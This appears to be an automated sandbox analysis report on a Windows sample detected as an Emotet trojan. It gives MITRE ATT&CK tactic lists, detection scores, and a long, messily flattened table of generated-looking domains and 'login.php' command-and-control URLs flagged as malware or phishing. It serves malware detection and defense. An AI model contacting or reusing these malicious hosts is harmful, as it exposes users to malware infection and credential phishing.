    Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 11 Non-Standard Port; 1 Remote Access Software; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
    [Behavior graph: ID 1553832; Sample: arxtPs1STE.exe; Startdate: 11/11/2024; Architecture: WINDOWS; Score: 100]

    Source          Detection  Scanner         Label                Link
    arxtPs1STE.exe  84%        ReversingLabs   Win32.Trojan.Emotet
    arxtPs1STE.exe  100%       Avira           TR/Crypt.XPACK.Gen
    arxtPs1STE.exe  100%       Joe Sandbox ML
    No Antivirus matches
    Source  Detection  Scanner  Label  Link
    Name  IP  Active  Malicious  Antivirus Detection  Reputation
                                                                                                                              vocykem.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                gahynus.com
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  pumypop.com
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    lyvysur.com
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      galypob.com
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        puzypav.com
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          gacyqoz.com
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            lykywid.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              lykytin.com
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                vofyref.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  qekytig.com
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    vocyzek.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      puvypoq.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        puvybeg.com
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          pupydig.com
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            pupyguq.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              qedyqal.com
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                vowymom.com
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  purypol.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    ganypeb.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      vopymit.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        vowyguf.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          pupytiq.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            lymyfoj.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              vowyzuf.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                gatyruw.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  qebynyg.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    puzymev.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      pupymol.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                        unknown
                                                                                                                                                                                        vojycif.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          qebyvyl.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            lymysan.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknowntrue
                                                                                                                                                                                              unknown
                                                                                                                                                                                              qekynuq.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknowntrue
                                                                                                                                                                                                unknown
                                                                                                                                                                                                puryjil.com
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknowntrue
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  puvytuv.com
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    galyzus.com
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      gadyfuh.com
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        vofycyk.com
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          lyxywer.com
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vopycoc.com/login.phpsvchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658175800.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660127068.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vopycom.com/login.phpsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gatyviw.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vonymuf.com/login.phpcom/login.phpsvchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qegyryq.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://purycap.com/login.phpsvchost.exe, 00000002.00000003.1807684932.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686150606.0000000002955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1701312723.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798156248.0000000002959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663699181.00000000060FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1728166475.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720674945.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://puzylyp.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2658895836.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vojyjyc.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://ganyzub.com/login.phpsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qeqyxov.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vowydef.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyrywoj.com/login.phpsvchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pumyjig.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://puvywav.com/svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lygyxun.com/login.phpsvchost.exe, 00000002.00000003.1547180269.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559573077.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564225122.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lysyvax.com/login.phpsvchost.exe, 00000002.00000003.1657651816.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658175800.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670053722.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658387523.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670914897.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://puzytul.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078075418.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vocygim.com/svchost.exe, 00000002.00000003.2026567354.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024313127.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024037953.00000000060EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pujyjav.com/http://qebytiq.com/http://vopybyt.com/http://gatyvyz.com/http://lyvytuj.com/http:svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gadyhoh.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vojyjof.com/http://gahyhob.com/Hsvchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gahynuw.com/login.phpsvchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vopybyt.com/svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648375447.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417918373.000000000612C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qeqyxyp.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lygyjuj.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pumyjip.com/login.phpsvchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1685225078.000000000297E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyvytud.com/svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            unknown
